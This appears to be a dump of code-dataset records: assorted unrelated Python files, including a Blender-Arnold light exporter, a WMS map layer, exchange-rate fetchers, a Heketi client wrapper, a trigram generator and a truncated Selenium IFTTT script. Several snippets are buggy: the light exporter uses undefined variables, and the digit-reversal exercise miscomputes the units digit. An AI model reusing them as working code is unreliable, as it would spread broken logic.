TL/PreviousScripts/CheckIndices.py","file_name":"CheckIndices.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"116188195","text":"import imp\nfrom mathutils import Matrix\nfrom arnold import *\n\nif \"bpy\" in locals():\n imp.reload(BaseLight)\nelse:\n import bpy\n from . 
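The nested membership loop at the end of CheckIndices.py above is a set intersection in disguise; assuming the two index lists from the script, the same check in one line:

    overlap = sorted(set(TestIdx) & set(TrainIdx))
    print(overlap)  # every index that appears in both Training/ and Test/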
import BaseLight\n\nclass PointLight(BaseLight.BaseLight):\n def __init__(self, light):\n super(PointLight,self).__init__(light)\n \n def write(self):\n self.alight = AiNode(b\"point_light\")\n AiNodeSetStr(self.alight,b\"name\",self.lightdata.name.encode('utf-8'))\n # set position\n # fist apply the matrix\n lmatrix = self.light.matrix_world\n tmatrix = mmatrix.transposed()\n AiArraySetMtx(matrices, 0 , tmatrix)\n AiNodeSetArray(self.alight, b\"matrix\", matrices)\n\n # Write common attributes\n super(PointLight,self).write()\n\n\n","sub_path":"PointLight.py","file_name":"PointLight.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"101347765","text":"#Entrada\nnumero = int(input('escreva o numero com 3 digitos: '))\n\n#Processamento\ncentena = int(numero/100)\ndezena = int((numero%100) // 10)\nunidade = int(numero)%((centena*100)+((dezena*10)))\n\n#Saida\nprint(f'{unidade}{dezena}{centena} e o inverso de {numero}')\n\n\n","sub_path":"q11_inverso_inteiro.py","file_name":"q11_inverso_inteiro.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"100813214","text":"# -*- coding: utf-8 -*-\n\n# Visigoth: A lightweight Python3 library for rendering data visualizations in SVG\n# Copyright (C) 2020 Niall McCarroll\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this software\n# and associated documentation files (the \"Software\"), to deal in the Software without \n# restriction, including without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all copies or \n# substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING\n# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\n# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nimport os\nimport urllib\nfrom xml.dom.minidom import parseString\n\nfrom visigoth.common.image import Image\nfrom visigoth.utils.httpcache import HttpCache\nfrom visigoth.map_layers import MapLayer\nfrom visigoth.utils.js import Js\nfrom visigoth.utils.mapping import Projections\n\nclass WMS(MapLayer):\n\n mundialis_url = \"http://ows.mundialis.de/services/service?&VERSION=1.1.1\"\n\n gibs_4326_url = \"https://gibs.earthdata.nasa.gov/wms/epsg4326/best/wms.cgi?VERSION=1.1.1\"\n\n gibs_3857_url = \"https://gibs.earthdata.nasa.gov/wms/epsg3857/best/wms.cgi?VERSION=1.1.1\"\n\n gibs_attribution = (\"We acknowledge the use of imagery provided by services from NASA's Global Imagery Browse Services (GIBS), part of NASA's Earth Observing System Data and Information System (EOSDIS).\",\"https://earthdata.nasa.gov/\")\n mundialis_attribution = (\"Contains modified SRTM data (2014)/NASA, processed by mundialis (www.mundialis.de) and vector data by OpenStreetMap contributors (2020), www.openstreetmap.org\",\"https://www.mundialis.de/en/ows-mundialis/\")\n\n layer_lookup = {\n (\"satellite\",\"EPSG:3857\"):(gibs_3857_url,\"Landsat_WELD_CorrectedReflectance_TrueColor_Global_Annual\",gibs_attribution),\n (\"satellite\", \"EPSG:4326\"):(gibs_4326_url, \"Landsat_WELD_CorrectedReflectance_TrueColor_Global_Annual\",gibs_attribution),\n (\"osm\",\"EPSG:3857\"):(mundialis_url,\"OSM-WMS\",mundialis_attribution),\n (\"osm\",\"EPSG:4326\"):(mundialis_url,\"OSM-WMS\",mundialis_attribution),\n }\n\n \"\"\"\n Create a WMS plot\n\n Keyword Arguments:\n type(str): \"satellite\" or \"osm\"\n image(str): type of image, for example \"jpeg\", \"png\"\n layer_name(str): the name of the layer to use\n url(str): a URL with the following format strings %(height)d, %(width)d, %(e_min)f, %(e_max)f, %(n_min)f, %(n_max)f\n date(datetime): date for which imagery is requested\n attribution(str): a citation or acknowledgement for the data provider\n attribution_url(str): a URL for the data provider\n embed_images(bool): whether to download and embed images into the document or link to them\n \n Note: specify either (type AND image) OR (url)\n Note: WMS layer can only currently work with the default Web Mercator (EPSG:3857) or Platte-Carrerre (EPSG:4326) projection\n \"\"\"\n def __init__(self,\n type=\"satellite\",\n image=\"png\",\n layer_name=\"\",\n url=\"\",\n date=None,\n attribution=\"\",\n attribution_url=\"\",\n embed_images=True\n ):\n super(WMS, self).__init__()\n self.bounds = None\n self.width = None\n self.attribution = attribution\n self.attribution_url = attribution_url\n self.url = url\n self.date = date\n self.layer_name = layer_name\n self.projection = None\n self.type = type\n self.image = image\n self.content = {}\n self.embed_images = embed_images\n\n def configureLayer(self,ownermap,width,height,boundaries,projection,zoom_to,fmt):\n self.ownermap = ownermap\n self.width = width\n self.height = int(height)\n self.bounds = boundaries\n self.projection = projection\n self.zoom_to = zoom_to\n\n @staticmethod\n def getCapabilitiesUrl(base_url):\n scheme, netloc, path, query_string, fragment = urllib.parse.urlsplit(base_url)\n params = urllib.parse.parse_qs(query_string)\n keys = list(params.keys())\n for key in keys:\n if key != \"SERVICE\" and key != 
\"VERSION\":\n del params[key]\n\n if \"VERSION\" not in params:\n params[\"VERSION\"] = \"1.1.1\"\n\n params[\"SERVICE\"] = \"WMS\"\n params[\"REQUEST\"] = \"GetCapabilities\"\n query_string = urllib.parse.urlencode(params, doseq=True)\n return urllib.parse.urlunsplit((scheme, netloc, path, query_string, fragment))\n\n @staticmethod\n def getFeatureInfoUrl(parameters, x, y, type = \"satellite\",projection = Projections.EPSG_3857,layer_name=\"\", url = \"\"):\n projname = projection.getName()\n details = WMS.layer_lookup.get((type,projname), None)\n if not url:\n url = details[0]\n if not layer_name:\n layer_name = details[1]\n scheme, netloc, path, query_string, fragment = urllib.parse.urlsplit(url)\n params = urllib.parse.parse_qs(query_string)\n keys = list(params.keys())\n for key in keys:\n if key != \"SERVICE\" and key != \"VERSION\":\n del params[key]\n\n if \"VERSION\" not in params:\n params[\"VERSION\"] = \"1.1.1\"\n\n params[\"SRS\"] = projname\n params[\"TRANSPARENT\"] = \"true\"\n params[\"FORMAT\"] = \"image/%(image_type)s\" % (parameters)\n params[\"QUERY_LAYERS\"] = layer_name\n params[\"LAYERS\"] = layer_name\n\n params[\"HEIGHT\"] = \"%(height)d\" % (parameters)\n params[\"WIDTH\"] = \"%(width)d\" % (parameters)\n params[\"BBOX\"] = \"%(e_min)f,%(n_min)f,%(e_max)f,%(n_max)f\" % (parameters)\n params[\"X\"] = x\n params[\"Y\"] = y\n params[\"INFO_FORMAT\"] = \"text/xml\"\n\n if \"date\" in parameters:\n params[\"TIME\"] = parameters[\"date\"].strftime(\"%Y-%m-%d\")\n\n params[\"SERVICE\"] = \"WMS\"\n params[\"REQUEST\"] = \"GetFeatureInfo\"\n query_string = urllib.parse.urlencode(params, doseq=True)\n return urllib.parse.urlunsplit((scheme, netloc, path, query_string, fragment))\n\n @staticmethod\n def getMapUrl(base_url,parameters):\n # good concise summary of the WMS protocol\n # https://www.nrcan.gc.ca/earth-sciences/geomatics/canadas-spatial-data-infrastructure/standards-policies/8938\n scheme, netloc, path, query_string, fragment = urllib.parse.urlsplit(base_url)\n params = urllib.parse.parse_qs(query_string)\n if \"VERSION\" not in params:\n params[\"VERSION\"] = \"1.1.1\"\n if \"STYLES\" not in params:\n params[\"STYLES\"] = \"\"\n params[\"SERVICE\"] = \"WMS\"\n params[\"SRS\"] = \"%(projection)s\" % (parameters)\n params[\"TRANSPARENT\"] = \"true\"\n params[\"FORMAT\"] = \"image/%(image_type)s\" % (parameters)\n params[\"LAYERS\"] = \"%(layers)s\" % (parameters)\n params[\"HEIGHT\"] = \"%(height)d\" % (parameters)\n params[\"WIDTH\"] = \"%(width)d\" % (parameters)\n params[\"BBOX\"] = \"%(e_min)f,%(n_min)f,%(e_max)f,%(n_max)f\" % (parameters)\n params[\"REQUEST\"] = \"GetMap\"\n if \"date\" in parameters:\n params[\"TIME\"] = parameters[\"date\"].strftime(\"%Y-%m-%d\")\n\n\n query_string = urllib.parse.urlencode(params, doseq=True)\n return urllib.parse.urlunsplit((scheme, netloc, path, query_string, fragment))\n\n @staticmethod\n def getLayerNames(type = \"satellite\",projection = Projections.EPSG_3857,url = \"\"):\n projname = projection.getName()\n if not url:\n details = WMS.layer_lookup.get((type,projname), None)\n url = details[0]\n\n capabilities_url = WMS.getCapabilitiesUrl(url)\n\n # fire off the GetCapabilities request\n capabilities = HttpCache.fetch(capabilities_url)\n\n s = capabilities.decode(\"utf-8\")\n\n d = parseString(s)\n layer_names = []\n\n def getText(node):\n rc = []\n for childnode in node.childNodes:\n if childnode.nodeType == node.TEXT_NODE:\n rc.append(childnode.data)\n return ''.join(rc)\n\n layers = d.getElementsByTagName(\"Layer\")\n 
for layer in layers:\n names = layer.getElementsByTagName(\"Name\")\n for name in names:\n if name.parentNode == layer:\n layer_names.append(getText(name))\n\n return layer_names\n\n @staticmethod\n def getFeatureInfo(parameters, x, y, type=\"satellite\", projection=Projections.EPSG_3857,url=\"\"):\n info_url = WMS.getFeatureInfoUrl(parameters,x,y,type,projection,url=url)\n info = HttpCache.fetch(info_url)\n print(info.decode(\"utf-8\"))\n\n def getHeight(self):\n return self.height\n\n def getWidth(self):\n return self.width\n\n def build(self,fmt):\n url = self.url\n projname = self.projection.getName()\n attribution = self.attribution\n attribution_url = self.attribution_url\n if not url:\n details = WMS.layer_lookup.get((self.type,projname),None)\n if details is not None:\n (url,layer_name,attribution) = details\n (attribution,attribution_url) = attribution\n else:\n raise Exception(\"No WMS configuration for combination \"+str((self.type,projname)))\n if self.layer_name:\n layer_name = self.layer_name\n self.setInfo(name=\"WMS\", attribution=attribution, url=attribution_url)\n\n (lonmin,latmin) = self.bounds[0]\n (lonmax,latmax) = self.bounds[1]\n (xmin,ymin) = self.projection.fromLonLat((lonmin,latmin))\n (xmax,ymax) = self.projection.fromLonLat((lonmax,latmax))\n\n zoom = 1\n while zoom <= self.zoom_to:\n self.content[zoom] = {}\n for zx in range(zoom):\n for zy in range(zoom):\n x1 = xmin + zx*(xmax-xmin)/zoom\n x2 = xmin + (zx+1)*(xmax-xmin)/zoom\n y1 = ymin + zy*(ymax-ymin)/zoom\n y2 = ymin + (zy+1)*(ymax-ymin)/zoom\n parameters = {\n \"layers\":layer_name,\n \"projection\":projname,\n \"e_min\":x1,\n \"n_min\":y1,\n \"e_max\":x2,\n \"n_max\":y2,\n \"image_type\":self.image,\n \"width\":self.width,\n \"height\":self.height}\n if self.date != None:\n parameters[\"date\"] = self.date\n resolved_url = WMS.getMapUrl(url,parameters)\n if self.embed_images:\n try:\n self.content[zoom][(zx,zy)] = HttpCache.fetch(resolved_url)\n except:\n print(\"Unable to download WMS image from %s\"%(resolved_url))\n self.content[zoom][(zx, zy)] = b\"\"\n else:\n self.content[zoom][(zx, zy)] = resolved_url\n zoom *= 2\n\n\n def getBoundaries(self):\n return self.bounds\n\n def draw(self,doc,cx,cy):\n zoom_groups = []\n ox = cx - self.width/2\n oy = cy - self.height/2\n zoom = 1\n while zoom <= self.zoom_to:\n g = doc.openGroup()\n g.addAttr(\"pointer-events\",\"none\")\n if zoom != 1:\n g.addAttr(\"visibility\",\"hidden\")\n tw = self.width/zoom\n th = self.height/zoom\n for zx in range(zoom):\n for zy in range(zoom):\n i = None\n if self.embed_images:\n bytes = self.content[zoom][(zx,zy)]\n if bytes:\n i = Image(\"image/%s\"%(self.image),content_bytes=bytes,width=tw,height=th)\n else:\n url = self.content[zoom][(zx, zy)]\n i = Image(\"image/%s\" % (self.image), path_or_url=url, width=tw, height=th, embed_image=False)\n if i:\n i.draw(doc, ox + (zx + 0.5) * tw, oy + self.height - (zy + 0.5) * th)\n zoom_groups.append(g.getId())\n doc.closeGroup()\n zoom *= 2\n\n with open(os.path.join(os.path.split(__file__)[0],\"wms.js\"),\"r\") as jsfile:\n jscode = jsfile.read()\n config = { \"zoom_groups\":zoom_groups }\n Js.registerJs(doc,self,jscode,\"wms\",cx,cy,config)\n","sub_path":"visigoth/map_layers/wms/wms.py","file_name":"wms.py","file_ext":"py","file_size_in_byte":13070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"197488250","text":"# coding=utf-8\n\ndef 
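getMapUrl in wms.py above fills in the WMS 1.1.1 GetMap query from a plain parameter dict. A hedged usage sketch: the endpoint and layer are the class's own mundialis defaults, and the bounding box is illustrative:

    params = {
        "layers": "OSM-WMS",
        "projection": "EPSG:4326",
        "e_min": -0.5, "n_min": 51.2, "e_max": 0.3, "n_max": 51.8,
        "image_type": "png",
        "width": 512, "height": 512,
    }
    url = WMS.getMapUrl(WMS.mundialis_url, params)
    # the result carries REQUEST=GetMap and
    # BBOX=-0.500000,51.200000,0.300000,51.800000 among its query parameters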
exrate_twbank(output_currency,input_currency='TWD',*arg,**kwarg):\n\t__source__=\"\"\"\n\n此服務由台灣銀行\nhttps://rate.bot.com.tw/\n所提供\n\n\"\"\"\n\tfrom urllib import request\n\timport requests\n\timport csv\n\tfrom decimal import Decimal\n\tdata={}\n\turl = \"https://rate.bot.com.tw/xrt/flcsv/0/day\"\n\n\tdef csv_import(url):\n\t\timport io\n\t\tdata={}\n\t\turl_open = request.urlopen(url)\n\t\tcsvfile = csv.reader(io.TextIOWrapper(url_open, encoding = 'utf-8'), delimiter=',')\n\t\tindex=None\n\t\tindex_jump=True\n\t\tlength=None\n\t\tfor row in csvfile:\n\n\t\t\tif index_jump:\n\t\t\t\tindex_jump=False\n\t\t\t\tindex=row\n\t\t\t\tlength=len(index)\n\t\t\t\tcontinue\n\t\t\tdata[row[0]]={\n\t\t\t'本行買入':{\n\t\t\t\t'現金':row[2],\n\t\t\t\t'即期':row[3]\n\t\t\t\t},\n\t\t\t'本行賣出':{\n\t\t\t\t'現金':row[12],\n\t\t\t\t'即期':row[13]\n\t\t\t\t}\n\n\t\t\t}\n\n\n\n\t\treturn data\n\texrate_data=csv_import(url)\n\taim_data=exrate_data[output_currency]\n\treturn aim_data['本行賣出']['即期']\n\n\n\n\ndef exRate(input_currency,output_currency,*arg,**kwarg):\n\t__source__=\"\"\"\n\n此服務由即匯站\nhttps://tw.rter.info/howto_currencyapi.php\n所提供\n\n\"\"\"\n\timport requests\n\tfrom decimal import Decimal\n\tdata={}\n\tr=requests.get('https://tw.rter.info/capi.php')\n\tcurrency=r.json()\n\tusd2input=\"USD\"+input_currency.upper()\n\tusd2output=\"USD\"+output_currency.upper()\n\ttry:\n\t\toutput_data=currency[usd2input]['Exrate']/currency[usd2output]['Exrate']\n\t\tdealing=Decimal(output_data).quantize(Decimal('0.0000'))\n\t\tdata['Exrate']=float(dealing)\n\t\tdata['UTC']=currency[usd2input]['UTC']\n\texcept KeyError:\n\t\te_text=\"Unknown currency: \"+input_currency+\" > \"+output_currency\n\t\traise IndexError(e_text)\n\n\treturn data\n\ndef main():\n\ttry:\n\t\tdata=exrate_twbank(\"JPY\")\n\t\tprint(data)\n\t\t#print(\"Exrate:\\t\",data['Exrate'])\n\t\t#print(\"Time:\\t\",data['UTC'])\n\texcept IndexError as e:\n\t\tprint(e)\n\n\nif __name__==\"__main__\":\n\tmain()\n","sub_path":"module/RTER_api.py","file_name":"RTER_api.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"220342784","text":"#!/usr/bin/env python3\n\n\"\"\"\n.. 
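exRate above derives any currency pair from the API's USD quotes by dividing USD-to-input by USD-to-output. With made-up quotes, the arithmetic reads:

    quotes = {"USDTWD": 31.0, "USDJPY": 155.0}
    print(quotes["USDTWD"] / quotes["USDJPY"])  # 0.2 -- i.e. 1 JPY buys 0.2 TWD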
module:: convert\n :synopsis: used to create info.txt and the .txt files.\n\n\"\"\"\nimport sys\nimport os\nimport argparse\nimport types\n\nargparser = argparse.ArgumentParser(description = \n'create info.txt, txname.txt, twiki.txt and sms.py')\nargparser.add_argument ('-utilsPath', '--utilsPath', \nhelp = 'path to the package smodels_utils',\\\ntype = str )\nargparser.add_argument ('-smodelsPath', '--smodelsPath', \nhelp = 'path to the package smodels_utils',\\\ntype = str )\nargs = argparser.parse_args()\n\nif args.utilsPath:\n utilsPath = args.utilsPath\nelse:\n databaseRoot = '../../../'\n sys.path.append(os.path.abspath(databaseRoot))\n from utilsPath import utilsPath\n utilsPath = databaseRoot + utilsPath\nif args.smodelsPath:\n sys.path.append(os.path.abspath(args.smodelsPath))\n\nsys.path.append(os.path.abspath(utilsPath))\nfrom smodels_utils.dataPreparation.inputObjects import MetaInfoInput,DataSetInput\nfrom smodels_utils.dataPreparation.databaseCreation import databaseCreator\nfrom smodels_utils.dataPreparation.massPlaneObjects import x, y, z\n\n\n\n#+++++++ global info block ++++++++++++++\ninfo = MetaInfoInput('CMS-PAS-SUS-17-004')\ninfo.url = 'http://cms-results.web.cern.ch/cms-results/public-results/preliminary-results/SUS-17-004/index.html'\ninfo.sqrts = 13\ninfo.lumi = 35.9\ninfo.prettyName = 'Multilepton EWK searches'\ninfo.private = False\ninfo.arxiv = ''\ninfo.contact = ''\ninfo.publication = ''\ninfo.comment = 'TChiHH, TChiZZ mass planes not provided. TChiWH/Z not implemented as BR(Chi20->H Chi10) = BR(Chi20->Chi10 Z)=0.5 provided for a single mass plane.'\ninfo.supersededBy = 'CMS-SUS-17-004'\n\n\n#+++++++ dataset block ++++++++++++++\ndataset = DataSetInput('data')\ndataset.setInfo(dataType = 'upperLimit', dataId = None)\n\n#+++++txName block +++++++++++++++++\n\nTChiWZ=dataset.addTxName('TChiWZ')\nTChiWZ.checked=''\nTChiWZ.constraint=\"[[['W']],[['Z']]]\"\nTChiWZ.condition=None\nTChiWZ.conditionDescription = None\nTChiWZ.source=\"CMS\"\n\n#offshell txName block\n\nTChiWZoff=dataset.addTxName('TChiWZoff')\nTChiWZoff.checked=''\nTChiWZoff.constraint=\"71.*([[['mu+','mu-']],[['l','nu']]] + [[['e+','e-']],[['l','nu']]])\"\nTChiWZoff.condition = \"cGtr([[['mu+','mu-']],[['l','nu']]],[[['e+','e-']],[['l','nu']]])\"\nTChiWZoff.massConstraint = [['dm < 86.0'], ['dm < 76.0']]\nTChiWZoff.conditionDescription=None\nTChiWZoff.source=\"CMS\"\n\n#++++++next mass plane block+++++++++\n\nTChiWZ_1 = TChiWZ.addMassPlane(2*[[x,y]])\nTChiWZ_1.figure='Fig. 
8-a'\nTChiWZ_1.figureUrl='http://cms-results.web.cern.ch/cms-results/public-results/preliminary-results/PAS-SUS-17-004/CMS-PAS-SUS-17-004_Figure_008-a.png'\nTChiWZ_1.dataUrl='http://cms-results.web.cern.ch/cms-results/public-results/preliminary-results/PAS-SUS-17-004/CMS-PAS-SUS-17-004_Figure_008-a.root'\nTChiWZ_1.histoDataUrl='http://cms-results.web.cern.ch/cms-results/public-results/preliminary-results/PAS-SUS-17-004/CMS-PAS-SUS-17-004_Figure_008-a.root'\nTChiWZ_1.exclusionDataUrl='http://cms-results.web.cern.ch/cms-results/public-results/preliminary-results/PAS-SUS-17-004/CMS-PAS-SUS-17-004_Figure_008-a.root'\nTChiWZ_1.setSources(dataLabels=['expExclusion','expExclusionM1','expExclusionP1','obsExclusion','obsExclusionM1','obsExclusionP1','upperLimits'],\n dataFiles=['orig/CMS-PAS-SUS-17-004_Figure_008-a.root','orig/CMS-PAS-SUS-17-004_Figure_008-a.root','orig/CMS-PAS-SUS-17-004_Figure_008-a.root','orig/CMS-PAS-SUS-17-004_Figure_008-a.root','orig/CMS-PAS-SUS-17-004_Figure_008-a.root','orig/CMS-PAS-SUS-17-004_Figure_008-a.root','orig/CMS-PAS-SUS-17-004_Figure_008-a.root'],\n dataFormats=['canvas','canvas','canvas','canvas','canvas','canvas','canvas'],objectNames=['TChiWZ;1','TChiWZ;1','TChiWZ;1','TChiWZ;1','TChiWZ;1','TChiWZ;1','TChiWZ;1'],\n indices= [4, 6, 5, 7, 9, 8, 2],units=[None,None,None,None,None,None,'pb'])\n\nTChiWZoff.addMassPlane(TChiWZ_1)\n\n#++++++next txName block+++++++++++++++\n\nTChiWH=dataset.addTxName('TChiWH')\nTChiWH.checked=''\nTChiWH.constraint=\"[[['W']],[['higgs']]]\"\nTChiWH.condition=None\nTChiWH.conditionDescription=None\nTChiWH.source=\"CMS\"\n\n\n#++++++next mass plane block++++++++\nTChiWH_1 = TChiWH.addMassPlane(2*[[x,y]])\nTChiWH_1.figure='Fig. 8-b'\nTChiWH_1.figureUrl='http://cms-results.web.cern.ch/cms-results/public-results/publications/PAS-SUS-17-004/CMS-PAS-SUS-17-004_Figure_008-b.png'\nTChiWH_1.dataUrl='http://cms-results.web.cern.ch/cms-results/public-results/publications/PAS-SUS-17-004/CMS-PAS-SUS-17-004_Figure_008-b.root'\nTChiWH_1.histoDataUrl='http://cms-results.web.cern.ch/cms-results/public-results/publications/PAS-SUS-17-004/CMS-PAS-SUS-17-004_Figure_008-b.root'\nTChiWH_1.exclusionDataUrl='http://cms-results.web.cern.ch/cms-results/public-results/publications/PAS-SUS-17-004/CMS-PAS-SUS-17-004_Figure_008-c.root'\nTChiWH_1.setSources(dataLabels=['expExclusion','expExclusionM1','expExclusionP1','obsExclusion','obsExclusionM1','obsExclusionP1','upperLimits'],\n dataFiles=['orig/CMS-PAS-SUS-17-004_Figure_008-b.root','orig/CMS-PAS-SUS-17-004_Figure_008-b.root','orig/CMS-PAS-SUS-17-004_Figure_008-b.root','orig/CMS-PAS-SUS-17-004_Figure_008-b.root','orig/CMS-PAS-SUS-17-004_Figure_008-b.root','orig/CMS-PAS-SUS-17-004_Figure_008-b.root','orig/CMS-PAS-SUS-17-004_Figure_008-b.root'],\n dataFormats=['canvas','canvas','canvas','canvas','canvas','canvas','canvas'],objectNames=['TChiWH;1','TChiWH;1','TChiWH;1','TChiWH;1','TChiWH;1','TChiWH;1','TChiWH;1'],\n indices= [4, 6, 5, 7, 9, 8, 2],units=[None,None,None,None,None,None,'pb'])\n\ndatabaseCreator.create()\n\n","sub_path":"smodels-database/13TeV/CMS/CMS-PAS-SUS-17-004/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":5596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"532762020","text":"import argparse\nfrom functools import partial\n\nfrom ft.functions import function_list\nfrom ft.internal import add_dynamic_type\nfrom ft.error import panic\n\n\ndef get_function(name, args, enable_currying=True):\n try:\n function = 
function_list[name]\n    except KeyError:\n        panic(\"Command not found: '{}'\".format(name))\n\n    if enable_currying:\n        # Partially apply the command\n        if len(args) > 0:\n            args = map(add_dynamic_type, args)\n            function = partial(function, *args)\n\n    return function\n\n\ndef new_command(name, enable_currying=True):\n    parser = argparse.ArgumentParser(description=name)\n    parser.add_argument('function', help='the function to run for each input')\n    parser.add_argument('args', help='optional arguments', nargs='*')\n    parser.add_argument('--column', '-c', type=int, help='apply function to a specific column')\n\n    args = parser.parse_args()\n\n    command = get_function(args.function, args.args, enable_currying)\n\n    return command, args\n","sub_path":"ft/ft/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"470555696","text":"import random\n\ndef get_word_list():\n    word_list = []\n    with open('sherlock_small.txt') as inputFile:\n        for line in inputFile:\n            # keep the stripped/cleaned line (the original discarded these results)\n            line = line.rstrip()\n            line = line.replace('--', ' ')\n            words = line.split()\n\n            for word in words:\n                word_list.append(word)\n    return word_list\n\ndef create_word_dict():\n    word_dict = {}\n    words = get_word_list()\n    for index in range(len(words) - 2):\n        word_dict.setdefault((words[index], words[index + 1]), []).append(words[index + 2])\n    return word_dict\n\nword_dict = create_word_dict()\nword_list = get_word_list()\nword_list_index = list(range(len(word_list)))\n\nstart_point = random.choice(word_list_index)\n\nnew_text = [word_list[start_point], word_list[start_point + 1]]\nword_pair = (word_list[start_point], word_list[start_point + 1])\n\ndef create_new_text(pair):\n    if pair in word_dict:\n        next_word = random.choice(word_dict[pair])\n        new_text.append(next_word)\n        create_new_text((pair[1], next_word))\n\ncreate_new_text(word_pair)\nprint(' '.join(new_text))\n","sub_path":"students/tonylee/Trigrams.py","file_name":"Trigrams.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"540813045","text":"# -*- coding:utf-8-*-\nimport unittest\nimport json\nimport os\nimport logging\nfrom requests.exceptions import ConnectionError\nfrom heketi import HeketiClient\nfrom cloudfly_heketi.admin_base import site\nfrom cloudfly_heketi.packaged.logger import logger\nfrom cloudfly_heketi.conf import conf\nfrom cloudfly_heketi.packaged.env_file import OSEnv\n\n\n\n\nc = HeketiClient(conf.HEKETI_SERVER, 'admin', conf.HEKETI_ADMIN_KEY)\ncluster_req = {}\n# c = HeketiClient(env_file.heketi_server,env_file.heketi_user,env_file.heketi_user_key)\n#\nclass Test_Heketi(unittest.TestCase,OSEnv):\n\n    # host = OSEnv().heketi_url()\n    # user = OSEnv().heketi_user()\n    # key = OSEnv().heketi_user_key()\n    # logger('设置Heketi连接方式')\n    # c = HeketiClient(host,user,key)\n    # cluster_req = {}\n\n    def create_cluster(self):\n        try:\n            cluster_req['file'] = True\n            cluster = c.cluster_create()\n            cluster_func = cluster\n            return cluster_func\n        except ConnectionError as e:\n            logger('%s' % e, logging.ERROR)\n            return False\n\n    def list_cluster(self):\n        logger('已连接到cluster接口,获取数据中')\n        logger('打印连接程序c: ' ,type(c.cluster_list()))\n        list = c.cluster_list()\n        print('list',type(list))\n        return list\n\n    def change_cluster(self,cid):\n        cluster_setflags_req = {}\n        cluster_setflags_req['block'] = False\n        cluster_setflags_req['file'] = True\n        ok = c.cluster_setflags(cid, 
cluster_setflags_req)\n self.assertTrue(ok)\n\n def del_cluster(self,cid):\n delete_cluster =c.cluster_delete(cid)\n return delete_cluster\n\n def info_cluster(self,cid):\n\n info=c.cluster_info(cid)\n logger('cluster_id:%s info %s' %(cid,info))\n return info\n\n def info_node(self,n_id):\n info = c.node_info(n_id)\n return info\n\n def add_node(self,c_id):\n node_req=c_id\n add_node = c.node_add(node_req)\n return add_node\n\n def list_node(self,c_id):\n list_ele = {}\n list_func = self.info_cluster(c_id)\n if list_func.get('nodes') != None:\n for list_n in list_func.get('nodes'):\n list_ele.update({'Cluster':list_func.get('id'),'Id':list_n})\n return list_ele\n\n def list_volume(self):\n list = c.volume_list()\n return list\n\n def info_volume(self,v_id):\n info = c.volume_info(v_id)\n print('volume',info)\n return info\n\n\nclass Get_Heketi(Test_Heketi):\n def get_cluster(self):\n cluster_list = self.list_cluster()\n return cluster_list\n\n def get_node(self,cid):\n node_list = json.dumps(self.list_node(cid))\n return node_list\n\n\nclass Save_Data(Test_Heketi):\n def save_func(self):\n for app_name in site.registered_admins:\n admin_class = site.registered_admins[app_name]\n return admin_class\n\n\n def save_cluster(self):\n admin_class = self.save_func().get('heketi_cluster')\n logger('获取cluster列表')\n cluster_id = self.list_cluster()\n logger('Cluster ID获取成功')\n logger('准备保存ClusterID')\n for cid in cluster_id.get('clusters'):\n logger('检查ClusterID是否存在')\n check_id = self.check_cluster_id(cid)\n logger('ClusterID检查完毕')\n if check_id:\n logger('ClusterID不存在,开始执行保存')\n admin_class.model.objects.create(cid=cid)\n logger('ClusterID已保存')\n return True\n\n def check_cluster_id(self,cid):\n admin_class = self.save_func().get('heketi_cluster')\n model_class = admin_class.model.objects.all()\n if not model_class:\n logger('数据库是空的,不需要检查')\n return True\n cluster_id = []\n for c_id in model_class.values('cid'):\n logger('获取数据库中已有ClusterID')\n cluster_id.append(c_id.get('cid'))\n\n logger('匹配已有ClusterID')\n if cid in cluster_id:\n logger('ClusterID存在数据库中,不保存数据')\n return False\n else:\n return True","sub_path":"cloudfly_heketi/packaged/heketis.py","file_name":"heketis.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"273343656","text":"#### This script should enable the applets that are non-conflicting.\n#### For example, the applet choose a TS, trigger and an AS , action\n#### The applets enabled should be only the particular trigger from the selected TS\n#### Every other appplet should be diabled to avoid chain applet executions and\nimport requests\nimport time\nimport timeit\nfrom threading import Thread\nimport time\nfrom pprint import pprint\nfrom pymongo import MongoClient\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.firefox.service import Service\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom 